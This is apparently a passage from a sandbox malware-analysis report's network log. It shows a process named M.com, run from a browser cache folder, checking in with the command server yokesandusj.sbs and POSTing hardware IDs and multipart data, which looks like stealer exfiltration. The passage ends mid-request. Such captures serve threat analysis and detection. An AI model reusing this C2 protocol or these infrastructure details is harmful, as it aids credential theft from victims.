                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=698d3174q97dk62tmf1c4ah1eu; expires=Fri, 02 May 2025 05:03:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMQdvgjYcu8lKmO6WxkrTiSznvCsM8MBzck0FlxUrqPbc7dF%2Bzuss9OJHao9hRqwMA3%2BNmoGxJM1u6ULarBxUDFDZPSN42hZaiMancPeA7CktyBYY4Sq%2FfVVOIFg9AAFf98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c2aefeec354-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1503&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=977&delivery_rate=1933774&cwnd=178&unsent_bytes=0&cid=ad80c07c311bb907&ts=478&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC246INData Raw: 31 63 62 35 0d 0a 32 6f 38 78 67 50 75 64 30 69 4c 55 6b 6e 37 63 69 51 50 76 2f 41 31 47 39 45 55 39 71 59 77 4b 79 6c 30 35 66 45 72 77 76 73 43 68 72 55 65 69 77 61 6e 2b 41 4b 66 33 58 4f 62 39 63 5a 71 5a 49 57 53 56 49 52 2b 54 36 6d 75 6d 4c 6c 78 51 61 49 62 54 34 75 44 70 55 4f 79 49 2b 50 34 41 73 65 70 63 35 74 4a 34 7a 5a 6c 6a 5a 4d 35 6e 57 4d 50 75 61 36 59 2f 57 42 63 6c 67 4e 4b 6a 73 75 4e 57 36 4a 37 2b 74 6b 4f 34 2f 78 75 35 37 47 4b 46 6b 6d 51 72 6e 43 67 66 68 61 35 76 73 48 38 44 58 67 65 56 79 71 47 58 37 6b 4c 72 32 65 44 2b 57 66 62 33 45 50 36 7a 49 59 36 5a 62 79 71 53 49 56 62 42 35 47 4b 75 50 6c 30 57 4f 70 6e 59 71 4c 4c 74 56 65 6d 55 39 36 4a 4f 73 76 67 51 76 2b 5a 69 7a 64 41 76 49 34 35 6e
                                                                                                                                                                                                                                                              Data Ascii: 1cb52o8xgPud0iLUkn7ciQPv/A1G9EU9qYwKyl05fErwvsChrUeiwan+AKf3XOb9cZqZIWSVIR+T6mumLlxQaIbT4uDpUOyI+P4Asepc5tJ4zZljZM5nWMPua6Y/WBclgNKjsuNW6J7+tkO4/xu57GKFkmQrnCgfha5vsH8DXgeVyqGX7kLr2eD+Wfb3EP6zIY6ZbyqSIVbB5GKuPl0WOpnYqLLtVemU96JOsvgQv+ZizdAvI45n
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 42 34 75 39 57 71 73 75 53 67 73 6c 67 74 72 69 70 36 4e 4b 6f 70 37 7a 38 42 6a 32 2b 42 43 77 37 6d 4b 43 6d 57 34 6b 68 43 68 66 79 4f 5a 67 72 44 56 55 45 53 65 63 31 71 57 77 35 46 54 74 6e 76 65 32 54 37 57 77 55 76 37 73 65 63 33 47 4c 77 53 47 4a 46 7a 66 34 33 6e 6f 49 42 55 48 61 4a 58 51 34 75 43 74 56 65 79 59 38 72 42 53 76 76 73 58 75 2f 6c 71 68 4a 4e 69 4a 4a 73 74 55 4d 6a 75 62 36 49 31 56 42 51 73 6e 39 47 6b 75 4f 30 54 72 4e 6e 34 71 41 44 75 73 44 2b 37 2b 32 61 42 69 43 30 65 31 6a 67 52 30 71 35 76 70 48 38 44 58 69 43 58 33 36 47 7a 34 6c 44 71 6b 75 32 77 55 72 44 39 47 61 7a 74 5a 49 4f 55 62 44 61 63 4b 56 6e 49 35 32 4f 68 4f 6c 77 61 61 4e 79 63 70 61 43 74 43 36 4b 34 38 72 74 4d 76 4f 63 63 2f 76 51 76 6c 4e 35 6f 4b 4e 5a
                                                                                                                                                                                                                                                              Data Ascii: B4u9WqsuSgslgtrip6NKop7z8Bj2+BCw7mKCmW4khChfyOZgrDVUESec1qWw5FTtnve2T7WwUv7sec3GLwSGJFzf43noIBUHaJXQ4uCtVeyY8rBSvvsXu/lqhJNiJJstUMjub6I1VBQsn9GkuO0TrNn4qADusD+7+2aBiC0e1jgR0q5vpH8DXiCX36Gz4lDqku2wUrD9GaztZIOUbDacKVnI52OhOlwaaNycpaCtC6K48rtMvOcc/vQvlN5oKNZ
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 32 54 6f 63 52 73 5a 4d 4e 4b 45 34 70 4c 75 52 2b 47 54 76 59 56 44 75 50 34 62 71 4b 74 2b 77 34 63 76 49 35 70 6e 42 34 76 6a 61 61 41 35 53 52 45 6c 6b 64 4b 73 74 2b 68 63 36 70 6e 2f 76 55 57 79 2b 78 65 39 35 6d 57 66 6c 47 38 73 6b 79 5a 56 77 61 34 6d 36 44 68 44 58 6e 44 53 37 62 57 7a 72 32 62 68 6c 2f 47 33 56 76 62 76 55 71 65 72 5a 6f 48 65 4e 32 53 62 4c 31 72 4f 34 57 6d 69 4d 56 34 55 4a 4a 72 53 6f 61 72 69 56 2b 4b 56 39 37 70 4e 75 50 51 55 74 2b 42 71 69 35 35 75 4c 74 5a 70 48 38 7a 32 4b 50 42 2f 62 78 6b 6b 6e 39 50 67 6a 65 35 64 37 4a 37 70 38 46 2f 34 36 56 79 35 35 79 48 56 33 6d 4d 74 6c 69 78 56 7a 2b 35 76 70 54 70 59 47 53 75 66 32 36 69 32 36 6c 66 75 6b 50 4b 32 51 4c 48 30 47 61 7a 75 61 49 47 53 4c 32 72 57 49 45 65 4c
                                                                                                                                                                                                                                                              Data Ascii: 2TocRsZMNKE4pLuR+GTvYVDuP4bqKt+w4cvI5pnB4vjaaA5SRElkdKst+hc6pn/vUWy+xe95mWflG8skyZVwa4m6DhDXnDS7bWzr2bhl/G3VvbvUqerZoHeN2SbL1rO4WmiMV4UJJrSoariV+KV97pNuPQUt+Bqi55uLtZpH8z2KPB/bxkkn9Pgje5d7J7p8F/46Vy55yHV3mMtlixVz+5vpTpYGSuf26i26lfukPK2QLH0GazuaIGSL2rWIEeL
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 68 58 58 6e 44 53 31 61 75 71 34 31 33 72 6c 50 6d 34 52 37 6a 39 46 37 6a 67 5a 6f 71 59 59 69 79 62 49 6c 7a 4b 36 6d 4b 36 50 46 41 55 4a 5a 69 63 37 50 6a 71 53 36 4c 42 76 35 64 4d 6e 2b 41 48 72 50 30 68 6b 74 42 32 5a 4a 45 72 48 35 4f 75 61 36 63 32 56 42 59 67 6e 64 4f 6d 74 75 74 56 37 35 7a 77 75 6c 4b 2b 2f 68 47 31 35 47 71 66 6e 6d 49 67 6d 69 4e 58 77 4f 51 6f 35 6e 39 63 42 6d 6a 4b 6e 4a 65 31 34 6c 50 68 6a 37 2b 76 44 71 2b 77 47 37 4b 72 4f 63 32 53 59 53 53 5a 4b 31 50 41 35 6d 6d 6b 4d 56 77 62 49 5a 72 55 73 4c 6e 70 57 2b 4f 58 38 4c 46 45 73 2f 55 59 75 65 39 6e 67 74 34 68 5a 4a 45 2f 48 35 4f 75 52 34 38 4b 47 54 38 53 30 73 50 73 6f 61 31 55 37 74 6d 6e 38 45 79 31 2f 42 53 78 37 57 69 42 6c 47 59 76 6d 69 78 62 78 2b 64 74 72
                                                                                                                                                                                                                                                              Data Ascii: hXXnDS1auq413rlPm4R7j9F7jgZoqYYiybIlzK6mK6PFAUJZic7PjqS6LBv5dMn+AHrP0hktB2ZJErH5Oua6c2VBYgndOmtutV75zwulK+/hG15GqfnmIgmiNXwOQo5n9cBmjKnJe14lPhj7+vDq+wG7KrOc2SYSSZK1PA5mmkMVwbIZrUsLnpW+OX8LFEs/UYue9ngt4hZJE/H5OuR48KGT8S0sPsoa1U7tmn8Ey1/BSx7WiBlGYvmixbx+dtr
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 75 67 4e 75 72 71 75 4e 65 37 5a 48 33 75 55 47 79 39 52 47 34 35 32 75 4d 6d 57 45 71 6e 6d 63 52 69 2b 6c 77 36 47 63 62 50 7a 69 4a 7a 72 53 31 7a 46 37 74 32 65 44 2b 57 66 62 33 45 50 36 7a 49 59 53 4d 61 79 6d 45 4c 6c 6a 46 34 57 75 36 50 6c 59 56 4f 70 58 54 70 72 2f 68 56 65 32 66 2f 72 56 4b 75 76 63 5a 74 65 52 74 7a 64 41 76 49 34 35 6e 42 34 76 41 59 37 73 6f 57 42 41 6a 68 4d 66 69 70 36 4e 4b 6f 70 37 7a 38 42 6a 32 38 78 65 31 37 32 47 42 6e 6d 73 70 6c 6a 56 51 7a 4f 6c 68 6f 79 31 52 47 53 2b 5a 31 4b 6d 33 36 30 48 75 6c 2b 32 31 55 71 53 77 55 76 37 73 65 63 33 47 4c 78 4b 52 4e 30 2f 49 72 46 6d 2b 50 45 30 56 4a 5a 36 63 76 66 62 30 45 2b 57 56 76 2b 67 41 73 50 38 56 76 65 52 67 68 4a 4a 69 49 5a 38 69 58 73 33 71 59 71 49 2f 58 52
                                                                                                                                                                                                                                                              Data Ascii: ugNurquNe7ZH3uUGy9RG452uMmWEqnmcRi+lw6GcbPziJzrS1zF7t2eD+Wfb3EP6zIYSMaymELljF4Wu6PlYVOpXTpr/hVe2f/rVKuvcZteRtzdAvI45nB4vAY7soWBAjhMfip6NKop7z8Bj28xe172GBnmspljVQzOlhoy1RGS+Z1Km360Hul+21UqSwUv7sec3GLxKRN0/IrFm+PE0VJZ6cvfb0E+WVv+gAsP8VveRghJJiIZ8iXs3qYqI/XR
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 75 2f 6a 71 58 36 4c 42 76 37 4e 48 74 66 45 57 74 2b 64 75 69 70 70 39 4c 70 45 31 58 73 72 6c 5a 61 51 2f 56 68 4d 69 6b 39 57 76 74 4f 42 55 35 5a 62 36 38 41 37 32 39 77 54 2b 73 79 47 73 6b 32 51 6f 7a 58 30 66 31 4b 42 78 36 44 68 58 58 6e 44 53 33 4b 69 39 35 31 37 68 6c 76 79 69 51 62 44 69 48 4c 50 68 63 34 65 56 61 69 6d 62 4b 6c 7a 4e 36 47 4f 6b 4c 56 49 65 4b 35 6d 63 37 50 6a 71 53 36 4c 42 76 35 4e 58 6f 50 6f 62 73 76 31 71 6a 4a 31 35 4b 59 5a 6e 45 59 76 2f 62 37 6c 2f 41 77 67 34 68 64 75 39 39 76 51 54 35 5a 57 2f 36 41 43 77 2b 52 71 35 37 57 2b 66 6d 32 6b 72 6d 53 35 57 7a 2b 5a 72 71 44 74 66 47 53 32 52 30 4b 6d 2f 37 6c 7a 6d 6b 50 47 35 54 2f 61 2b 58 4c 6e 7a 49 64 58 65 54 6a 2b 56 4b 31 4b 4c 38 53 61 78 66 31 77 53 61 4d 71
                                                                                                                                                                                                                                                              Data Ascii: u/jqX6LBv7NHtfEWt+duipp9LpE1XsrlZaQ/VhMik9WvtOBU5Zb68A729wT+syGsk2QozX0f1KBx6DhXXnDS3Ki9517hlvyiQbDiHLPhc4eVaimbKlzN6GOkLVIeK5mc7PjqS6LBv5NXoPobsv1qjJ15KYZnEYv/b7l/Awg4hdu99vQT5ZW/6ACw+Rq57W+fm2krmS5Wz+ZrqDtfGS2R0Km/7lzmkPG5T/a+XLnzIdXeTj+VK1KL8Saxf1wSaMq
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC266INData Raw: 58 50 70 6a 2f 71 33 56 76 54 46 48 37 44 6c 5a 70 76 65 63 42 76 59 5a 31 36 4c 74 6c 47 78 66 30 31 65 63 4d 43 53 34 71 71 74 43 36 4c 65 2f 4b 4a 53 73 50 4d 4b 76 61 78 66 73 37 6c 35 4c 70 45 33 57 4e 7a 68 4b 4f 5a 2f 56 46 35 77 71 35 79 72 76 2f 5a 43 39 4a 54 76 74 77 43 4a 76 6c 79 6d 71 7a 6e 4e 71 32 77 71 6d 43 42 4a 32 71 4e 50 76 6a 56 63 44 69 2b 46 30 2b 4c 32 72 56 57 69 77 61 7a 2b 41 4c 4c 68 58 4f 61 37 4d 39 62 4c 50 48 50 47 64 55 43 46 39 79 69 2b 66 77 4e 4d 5a 74 4c 4f 34 75 43 74 46 4f 47 4c 37 62 5a 44 6f 50 4e 62 67 4e 56 47 6c 35 4e 70 4d 34 63 5a 59 63 7a 30 5a 61 34 6f 53 6c 49 39 6b 64 4b 73 76 2f 73 54 72 4e 6e 77 38 42 69 50 73 46 54 2b 31 43 2f 4e 68 69 39 38 31 68 4a 63 78 65 42 76 76 69 34 57 4f 54 4b 66 32 72 57 70
                                                                                                                                                                                                                                                              Data Ascii: XPpj/q3VvTFH7DlZpvecBvYZ16LtlGxf01ecMCS4qqtC6Le/KJSsPMKvaxfs7l5LpE3WNzhKOZ/VF5wq5yrv/ZC9JTvtwCJvlymqznNq2wqmCBJ2qNPvjVcDi+F0+L2rVWiwaz+ALLhXOa7M9bLPHPGdUCF9yi+fwNMZtLO4uCtFOGL7bZDoPNbgNVGl5NpM4cZYcz0Za4oSlI9kdKsv/sTrNnw8BiPsFT+1C/Nhi981hJcxeBvvi4WOTKf2rWp
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 33 32 62 39 0d 0a 50 69 77 47 4b 2b 72 4f 64 33 4d 4e 48 48 46 63 41 2b 5a 38 53 61 78 66 30 31 65 63 4d 43 53 34 71 71 74 43 36 4c 65 2f 4b 4a 53 73 50 4d 4b 76 61 78 66 73 37 42 6f 49 70 4d 67 54 34 6e 41 59 37 77 34 47 31 42 6f 6e 5a 7a 36 67 61 30 62 6f 71 61 78 38 46 6a 32 71 46 79 4c 36 47 2b 44 6d 58 6b 31 32 77 6c 59 7a 65 74 76 75 48 31 31 46 54 79 56 6e 4f 7a 34 36 78 4f 36 79 62 48 77 52 4b 65 77 52 4f 36 35 4f 74 6a 4e 4f 48 54 45 4f 42 48 53 72 6e 37 6f 5a 77 6c 51 61 49 43 63 2b 76 69 71 55 50 43 4c 2b 62 4e 57 74 62 63 69 67 4f 68 33 67 4a 46 6b 4a 61 67 5a 63 63 62 76 61 36 5a 39 61 67 67 6c 67 74 2b 6e 76 39 4e 74 37 4a 37 72 74 30 36 77 38 46 7a 77 71 32 37 4e 78 6c 5a 6b 33 6d 64 67 68 61 35 77 36 47 63 62 4b 79 75 63 30 71 57 75 2f 42
                                                                                                                                                                                                                                                              Data Ascii: 32b9PiwGK+rOd3MNHHFcA+Z8Saxf01ecMCS4qqtC6Le/KJSsPMKvaxfs7BoIpMgT4nAY7w4G1BonZz6ga0boqax8Fj2qFyL6G+DmXk12wlYzetvuH11FTyVnOz46xO6ybHwRKewRO65OtjNOHTEOBHSrn7oZwlQaICc+viqUPCL+bNWtbcigOh3gJFkJagZccbva6Z9agglgt+nv9Nt7J7rt06w8Fzwq27NxlZk3mdgha5w6GcbKyuc0qWu/B
                                                                                                                                                                                                                                                              2025-01-06 11:16:43 UTC1369INData Raw: 34 67 37 32 34 6c 7a 6d 71 79 61 4f 6a 48 30 69 6c 54 46 63 6a 4e 42 57 6a 7a 46 63 48 7a 36 43 30 61 36 5a 37 6b 4c 6f 70 38 47 6c 51 37 6a 2b 47 36 6a 36 49 63 50 65 59 47 54 4f 48 68 2b 44 72 6c 66 6d 66 30 4e 65 63 4e 4c 70 6f 62 62 6a 56 50 53 49 73 70 64 4f 73 66 45 4b 72 75 5a 74 72 4a 31 2b 4c 74 5a 70 48 38 32 75 4d 50 70 78 47 78 6f 35 30 6f 54 79 36 72 59 47 73 63 36 76 34 6c 2f 34 36 56 79 6f 71 7a 6e 66 30 43 38 32 31 6e 38 66 6a 4f 31 36 75 6a 6c 59 43 43 76 56 34 70 79 64 2b 6c 44 79 6e 2f 79 4f 66 70 33 38 47 72 6e 78 5a 6f 75 34 54 32 54 59 5a 31 43 4c 74 6c 48 6f 64 78 73 68 5a 74 4c 45 34 75 43 74 5a 75 47 58 38 62 64 57 70 37 30 35 71 65 68 78 69 35 30 76 61 74 59 68 48 35 4f 2b 4a 75 67 37 53 6c 35 77 77 6f 37 35 37 62 34 45 73 73 76
                                                                                                                                                                                                                                                              Data Ascii: 4g724lzmqyaOjH0ilTFcjNBWjzFcHz6C0a6Z7kLop8GlQ7j+G6j6IcPeYGTOHh+Drlfmf0NecNLpobbjVPSIspdOsfEKruZtrJ1+LtZpH82uMPpxGxo50oTy6rYGsc6v4l/46Vyoqznf0C821n8fjO16ujlYCCvV4pyd+lDyn/yOfp38GrnxZou4T2TYZ1CLtlHodxshZtLE4uCtZuGX8bdWp705qehxi50vatYhH5O+Jug7Sl5wwo757b4Essv


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.549853104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:44 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=45GPJ30OVSS5KLSQSA
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 12834
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:44 UTC12834OUTData Raw: 2d 2d 34 35 47 50 4a 33 30 4f 56 53 53 35 4b 4c 53 51 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 34 35 47 50 4a 33 30 4f 56 53 53 35 4b 4c 53 51 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 35 47 50 4a 33 30 4f 56 53 53 35 4b 4c 53 51 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d
                                                                                                                                                                                                                                                              Data Ascii: --45GPJ30OVSS5KLSQSAContent-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--45GPJ30OVSS5KLSQSAContent-Disposition: form-data; name="pid"2--45GPJ30OVSS5KLSQSAContent-Disposition: form-data; name="lid"hRjzG3--TRON
                                                                                                                                                                                                                                                              2025-01-06 11:16:45 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ehtsvb56571hp80sm9ev4jkpg4; expires=Fri, 02 May 2025 05:03:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxg%2FRojCdROoRtx4WTzo9KL9tXVEjSC2sfWq4WptvLOFTEqftFVQmp%2Fb5gbszMaOGFpNYaefPGzQQl55mf92DlKG6d8QiW59e97CkJAflyBXWwudY2dtEs%2FWFHbOPTUCfiw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c327cba8c93-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2053&min_rtt=1839&rtt_var=1118&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13773&delivery_rate=821609&cwnd=192&unsent_bytes=0&cid=ea10fc7939fbd05d&ts=551&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.549860104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:45 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=UMB2YZ25PIS3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 15040
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:45 UTC15040OUTData Raw: 2d 2d 55 4d 42 32 59 5a 32 35 50 49 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 55 4d 42 32 59 5a 32 35 50 49 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 4d 42 32 59 5a 32 35 50 49 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 55 4d 42 32 59 5a 32 35 50 49 53 33 0d 0a 43
                                                                                                                                                                                                                                                              Data Ascii: --UMB2YZ25PIS3Content-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--UMB2YZ25PIS3Content-Disposition: form-data; name="pid"2--UMB2YZ25PIS3Content-Disposition: form-data; name="lid"hRjzG3--TRON--UMB2YZ25PIS3C
                                                                                                                                                                                                                                                              2025-01-06 11:16:46 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ave10g6rvnpn2fa1kl855ldjkj; expires=Fri, 02 May 2025 05:03:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YF6uX45IUIIjSK9j0ATgqUYVgVaxaFF8V9xiI%2BVJ24UNp8SEzuK%2FTt0kq42UQWgypTf84KHQIYDEGjMUTHTgvp8yT9rzmScjk6fylZYkxuEYvsysnzbxAwf2pvKVOx82J2U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c3918cd7c96-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1833&rtt_var=702&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15973&delivery_rate=1593016&cwnd=173&unsent_bytes=0&cid=2bbe20a9043cb73a&ts=468&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.549867104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:46 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=NR43MFZ36ZVA6TH
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20548
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
